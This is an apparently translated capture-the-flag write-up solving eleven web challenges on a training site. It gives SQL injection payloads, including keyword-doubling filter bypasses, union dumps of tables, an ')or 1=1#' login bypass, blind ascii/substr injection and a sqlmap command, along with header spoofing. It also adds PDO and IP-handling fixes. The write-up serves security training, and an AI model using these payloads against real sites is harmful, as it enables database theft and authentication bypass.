WEB CTF Simplexue Academy (西普学院)

1. Chrysanthemum

                         http://ctf1.simplexue.com/web/6/  

Hint:

Please make sure you have installed .net framework 9.9!    

Intercept the request with Burp and change the User-Agent to Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9). All the injections below are done under this condition.
id=1 returns hacker:welcome to simplexue CTF
id=4 returns hacker: don’t try again

id=0/**/ununionion/**/seselectlect/**/1,user(),database()
User name and database name: root@cuit-092a2b258a      inject

id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--
simplexue: flag is SimCTF{xuectf}

2.Forbidden

                          http://ctf1.simplexue.com/basic/header/

Hint:

You don't have permission to access /on this server.

Make sure you are in HongKong

Intercept the request with Burp and change the header to Accept-Language:zh-hk, which gives => KEY:123JustUserAGent

3. The head is a bit big

                      http://ctf1.simplexue.com/web/1/index.asp?id=1

Hint:

You don't have permission to access / on this server.

Make sure you are in the region of England and browsing this site with Internet Explorer

Intercept the request with Burp.

Change the User-Agent to Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)

and set Accept-Language:en-gb

The key is:HTTpH34der

4. Please enter the password

              http://ctf1.simplexue.com/basic/js/index.asp


Intercept the response with Burp.

This yields the JavaScript:

<script type="text/javascript">
    document.oncontextmenu=function(){return false};

    var a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    a = Math.floor(a);

    function check(){
        if(document.getElementById("txt").value==a){
            return true;
        }else{
            alert("密码错误");
            return false;
        }
    }
</script>

Compute the value with a C program:

#include<stdio.h>
int main()
{
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}

Result: 424178.562500   Input: 424178   The key pops up => @#$JSisagoodtool@#$


5. This one looks a bit simple

              http://ctf5.simplexue.com/8/index.php?id=1

id=1'

id=1 and 1=1

id=1 and 1=2                          confirms SQL injection

id=1 order by 2                       two columns

id=1 union select 1,2                 column 2 is echoed back

version():                                5.0.45-community-nt

database():                             my_db

user():                                    phpsql@localhost


Dump the databases:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,1

                 information_schema     my_db

Dump the tables:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1

                           news           thiskey

Dump the columns:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1

                                id        content           k0y

Dump the contents:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump


6. Cat catches mouse

           http://ctf1.simplexue.com/basic/catch/          

Inspecting the HTTP traffic shows   Content-Row:    MTQ0ODU0MzEyNA==    Submitting   MTQ0ODU0MzEyNA==   gives   => KEY: #WWWnsf0cus_NET#



7. The programmer's problem

                        http://ctf1.simplexue.com/web/4/index.php

View the source code:

<?php


if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("*******", "****", "****");
	mysql_select_db("****") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  if($row['user']=="admin") {
    echo "<p>Logged in! Key: *********** </p>";
  }

  if($row['user'] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}

?>
Entering admin gives the message   You are not admin!   So the idea is to close the clause: entering =>   ')or 1=1#    yields Key: WWW_SIMPLEXUE_COM
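
Why that input works, and the fix, as an added example that is not the challenge's code: the first function reproduces the string concatenation from the source so the resulting SQL text can be read, the second binds the same values with PDO. It assumes the pdo_sqlite extension; the in-memory table and its row are constructed for the demonstration.

```php
<?php
// Added example, not the challenge's code. Table "php" and columns user/pw
// follow the source above; the row and its password are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE php (user TEXT, pw TEXT)");
// md5() is kept only to mirror the source; it is not a suitable password hash.
$db->prepare("INSERT INTO php (user, pw) VALUES (?, ?)")
   ->execute(['admin', md5('constructed-password')]);

// The SQL text the concatenating code sends for a given input.
function build_concatenated(string $user, string $pass): string {
    $pass = md5($pass);
    return "select user from php where (user='$user') and (pw='$pass')";
}

// Same lookup with bound parameters: the values travel separately from the
// statement, so quotes and parentheses in them never become SQL syntax.
function lookup_bound(PDO $db, string $user, string $pass): ?string {
    $st = $db->prepare("select user from php where (user = :u) and (pw = :p)");
    $st->execute([':u' => $user, ':p' => md5($pass)]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['user'];
}

$input = "')or 1=1#";   // the input used in the write-up

// Printing the concatenated text shows the input closing (user='...') early;
// in MySQL the # then comments out the password check.
echo build_concatenated($input, 'x'), "\n";

// Bound: the same input is only ever compared as a literal user name.
var_dump(lookup_bound($db, $input, 'x'));
// Bound: a legitimate login still resolves to its row.
var_dump(lookup_bound($db, 'admin', 'constructed-password'));
```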

8. what a fuck! What the hell is this thing?

                             http://ctf5.simplexue.com/DUTCTF/1.html

A bit dizzying. It looked like JS obfuscation, so I copied it, wrapped it in <script> </script>, and an alert popped up:  Ihatejs


9. Seems a bit difficult

                         http://ctf8.simplexue.com/phpaudit/

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
HTTP protocol:

Intercept the request with Burp and add   X-Forwarded-For: 1.1.1.1   to spoof the IP as   1.1.1.1            => Key is http_client
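
A hardened counterpart to GetIP(), as an added example that is not the challenge's code: it uses REMOTE_ADDR unless the peer is a known reverse proxy, and never reads Client-IP. The function name client_ip, the $trustedProxies list and the sample addresses are assumptions constructed for illustration.

```php
<?php
// Added example, not the challenge's code. $trustedProxies is an assumed
// deployment setting: the addresses of the reverse proxies you operate.
function client_ip(array $server, array $trustedProxies): string {
    // REMOTE_ADDR is the TCP peer address; request headers are
    // client-controlled text and carry no authority by themselves.
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }
    // The peer is our own proxy: walk X-Forwarded-For from right to left and
    // return the first hop that is not one of our proxies. Anything further
    // left was supplied by the client and is ignored.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break;                       // malformed entry: stop trusting the header
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

// Constructed requests: one sent directly with a forged header, one relayed
// by the trusted proxy with a forged left-most entry.
$proxies  = ['10.0.0.5'];
$direct   = ['REMOTE_ADDR' => '203.0.113.7',
             'HTTP_X_FORWARDED_FOR' => '1.1.1.1'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5',
             'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 203.0.113.7'];

// Each call resolves to the address that actually connected (to the server
// or to the proxy), not to the value typed into the header.
echo client_ip($direct, $proxies), "\n";
echo client_ip($viaProxy, $proxies), "\n";
```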


10. Come in and get what you want

                      http://ctf1.simplexue.com/web/1/index.asp?id=1

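This challenge is about finding the admin backend:

Enter admin; the page source shows the hint => Heh, the idea is right, but it is not here. Think about who has the most power.

Enter system     => KEY: "!!!WellDoneBrother!"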


11. Looks a bit difficult

                  http://ctf1.simplexue.com/basic/inject/


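This is a blind injection challenge.

Enter the user name admin and any password, then submit.

Message: login failed, wrong user name and password

Then proceed like this: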

     http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login

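Note:

ascii(str): converts a string to its ASCII code; substr(str,start,length)/substring(str,start,length): extracts a substring (str: the string, start: the start position, length: the length)

The database obtained: test

Then replace database() to obtain all the data.

Note: this challenge filters select; use selselectect instead.

With sqlmap, do it like this: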

    sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass="  -D test --table






